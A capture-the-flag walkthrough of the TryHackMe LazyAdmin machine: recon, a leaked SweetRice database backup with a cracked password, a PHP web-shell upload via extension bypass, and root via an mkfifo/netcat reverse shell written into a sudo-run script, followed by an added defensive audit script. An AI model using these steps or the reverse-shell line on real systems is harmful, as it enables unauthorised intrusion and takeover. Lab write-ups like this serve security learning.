LazyAdmin (Try Hack Me)

GrimTheRipper
3 min read · Sep 13, 2024


Perform an Nmap scan to find services and open ports, you can use the following command in

nmap -sV <target>

Once port 80 was found to be open, we used the dirsearch tool to scan for directories and files.

python3 dirsearch.py -u <target> -x 400,401,403

Then we opened the path “/content” in the web browser.

After discovering that the site runs the SweetRice CMS, we searched for an exploit as the next step.

Go to http://IP_target/content/inc/mysql_backup

Download: mysql_bakup_20191129023059-1.5.1.sql 2019-11-29 12:30 4.7K

Inspect the contents of mysql_bakup_20191129023059-1.5.1.sql from the command line.

cd Downloads
cat mysql_bakup_20191129023059-1.5.1.sql

The password in the dump is stored as an MD5 hash. After recovering the plaintext, we have the credential | manager: Password123

The next item of interest is “SweetRice 1.5.1 - Arbitrary File Upload”.

The source code indicates that the path to the login page is /as. Go to this path and log in.

Go to the Media Center to upload a file.

The allowed file extensions for upload are…

Then upload the malicious PHP file.

Open a listener on port 1234.

Upload the file

After intercepting the HTTP request with Burp Suite, change the extension of the uploaded file to .php5, then click the “Forward” button.

Finally we got the shell.

Next, we move on to privilege escalation.

Run sudo -l to list the commands this user may run with sudo.

We locate and make changes to the file backup.pl.

We will execute the sh file:

$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

Replace the IP address with mine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.18.147 5554 >/tmp/f

Write the new reverse shell into the file:

$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.18.147 5554 >/tmp/f" > /etc/copy.sh

Open a netcat listener and wait.

In the reverse shell, run the command “sudo perl /home/itguy/backup.pl”.

Go back to the waiting netcat listener. Finally, we got root.
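The escalation above works because a script that sudo runs as root hands control to /etc/copy.sh, a file the low-privileged user was able to overwrite. As an added example (not part of the original write-up), the shell functions below audit a sudo-run script and every absolute path it mentions for write bits held by group or others; the temporary paths, the Perl line and the file contents in demo are constructed assumptions.

```shell
#!/bin/sh
# Added example: audit a script that sudo runs as root for files that
# non-owners can rewrite (the /etc/copy.sh situation in this write-up).

# Succeeds if group or others hold the write bit on the file $1.
# -H follows a symlink given on the command line; -prune stops recursion.
writable_by_others() {
    [ -n "$(find -H "$1" -prune \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null)" ]
}

# Check SCRIPT and every absolute path mentioned in its text.
# Prints one line per finding; returns 1 if anything was found, else 0.
audit_sudo_script() {
    script=$1
    findings=0
    for p in "$script" $(grep -oE '/[A-Za-z0-9_./-]+' "$script" | sort -u); do
        [ -f "$p" ] || continue    # only regular files are audited
        if writable_by_others "$p"; then
            echo "UNSAFE: $p is writable by group or others"
            findings=1
        fi
    done
    return "$findings"
}

# Constructed sample: a Perl wrapper that runs a helper shell script, which is
# assumed to be what backup.pl does with /etc/copy.sh on the target.
demo() {
    d=$(mktemp -d)
    printf 'system("sh", "%s/copy.sh");\n' "$d" > "$d/backup.pl"
    echo 'echo "backup placeholder"' > "$d/copy.sh"
    chmod 755 "$d/backup.pl"
    chmod 757 "$d/copy.sh"    # weak: any user can replace what root executes
    audit_sudo_script "$d/backup.pl" && weak=0 || weak=1
    chmod 755 "$d/copy.sh"    # corrected: only the owner may write
    audit_sudo_script "$d/backup.pl" && fixed=0 || fixed=1
    rm -rf "$d"
    echo "weak=$weak fixed=$fixed"
}

demo
```

On a real host, point audit_sudo_script at each script named in the sudoers rules; any finding means root's behaviour can be changed by whoever can write that file.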
